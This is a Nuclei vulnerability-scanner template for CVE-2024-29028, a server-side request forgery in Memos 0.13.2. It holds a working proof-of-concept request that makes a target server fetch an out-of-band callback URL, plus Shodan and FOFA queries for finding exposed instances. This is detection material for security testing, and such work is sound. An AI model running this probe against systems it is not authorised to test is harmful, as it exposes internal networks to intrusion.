SSRF vulnerabilities exist in the memos API service `/o/get/httpmeta` that allow unauthenticated and authenticated users to enumerate and read from the internal network. In addition, one SSRF vulnerability leads to a reflected XSS vulnerability, which may allow an attacker complete control over the administrator account.
PoC代码[已公开]
id: CVE-2024-29028
info:
name: Memos 0.13.2 - Server-Side Request Forgery
author: ritikchaddha
severity: medium
description: |
SSRF vulnerabilities exist in the memos API service `/o/get/httpmeta` that allow unauthenticated and authenticated users to enumerate and read from the internal network. In addition, one SSRF vulnerability leads to a reflected XSS vulnerability, which may allow an attacker complete control over the administrator account.
reference:
- https://securitylab.github.com/advisories/GHSL-2023-154_GHSL-2023-156_memos/
- https://nvd.nist.gov/vuln/detail/CVE-2024-29028
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-918
cve-id: CVE-2024-29028
epss-score: 0.06339
epss-percentile: 0.90621
metadata:
verified: true
max-request: 1
shodan-query: title:"Memos"
fofa-query: title="Memos"
tags: cve,cve2024,ssrf,memos,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/o/get/httpmeta?url=https://{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(interactsh_protocol, "dns")'
- 'contains_any(tolower(body), "memos", "title\":")'
condition: and
# digest: 4a0a004730450221009b6c94ce6e60bbbacda2aa83a7503c723a82a5d7b6995c305d5597ca1dd6559a02205a4e35ea874cbf3bf8c1c8828cda3f8bc7358811078ac1822f705d61aff99ccb:922c64590222798bb761d5b6d8e72950